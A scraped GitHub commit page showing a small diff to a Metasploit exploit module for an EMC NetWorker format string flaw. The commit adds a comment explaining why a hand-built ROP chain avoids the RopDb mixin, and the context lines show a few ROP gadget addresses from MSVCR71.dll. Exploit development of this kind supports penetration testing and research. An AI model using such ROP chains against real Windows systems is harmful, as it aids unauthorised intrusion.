We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents e385aad + 77b1e9e commit 70d53b4Copy full SHA for 70d53b4
modules/exploits/windows/emc/networker_format_string.rb
@@ -86,6 +86,8 @@ def exploit
86
rop_gadgets =
87
[
88
# rop chain generated with mona.py
89
+ # The RopDb mixin isn't used because there are badchars
90
+ # which must be avoided
91
0x7c354dab, # POP EBP # RETN [MSVCR71.dll]
92
0x7c354dab, # skip 4 bytes [MSVCR71.dll]
93
0x7c37678f, # POP EAX # RETN [MSVCR71.dll]
0 commit comments